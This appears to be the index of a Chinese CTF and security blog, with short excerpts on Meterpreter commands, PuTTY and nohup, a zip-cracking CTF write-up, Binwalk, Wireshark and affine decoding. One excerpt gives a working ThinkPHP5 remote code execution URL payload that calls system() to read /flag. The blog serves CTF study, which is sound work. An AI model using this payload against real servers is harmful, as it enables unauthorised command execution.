25
2023
10

msfconsole命令大全

1.基本命令
help # 查看Meterpreter帮助
background# 返回,把meterpreter后台挂起
bgkill# 杀死一个背景 meterpreter 脚本
bglist#提供所有正在运行的后台脚本的列表
bgrun#作为一个后台线程运行脚本
channel#显示活动频道
sessions -i nu

07
2023
10

关闭putty后sh脚本无法在后台运行的解决办法

用putty连接centos,要执行一个sh脚本,正常用nohup直接运行命令,就可以在后台运行

nohup ./1.sh &

但关闭putty后,发现脚本也停止了


问题出在,直接点putty的右上角X关闭按钮,nohup也会停止


解决方法1:直接在putty中输入exit退出即可

解决方法2:将系统输出重定向

12
2023
09

【CTF解题】HaveFun(郁离歌!郁离歌! flag是一串有意义的字符)

一、下载压缩包,提示密码,发现有100个gif图片和一个wcy_____.txt文件

二、猜测需要掩码爆破,掩码前3位为wcy,需要爆破后5位

20
2023
08

漏洞集合

ThinkPhp5

/index.php?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

27
2023
07

仿射在线解码

def
23
2023
07

文件分离操作

1.Binwalk工具
 
Binwalk是linux下用来分析和分离工具的工具,可以快速分辨文件是否由多个文件合并而成,并将文件进行分离,如果分离成功会在目标文件的目录
 
同目录下会生成一个形如_文件名_extracted的文件目录,目录中有分离的文件,binwalk有个特点,遇到压缩包会自动解压。
 
用法:
 
分析文件:binwalk filename
 

25
2023
04

【工具】Wireshark

1.流量包文件分析
流量包就是说所谓的传递过程中,将传递的数据抓取下来,保存成一个文件。
2.wireshark常用的过滤命令
1)ip.src eq x.x.x.x 过滤源ip
2)过滤端口
3)过滤mac地址
4)包长度过滤
5)http模式过滤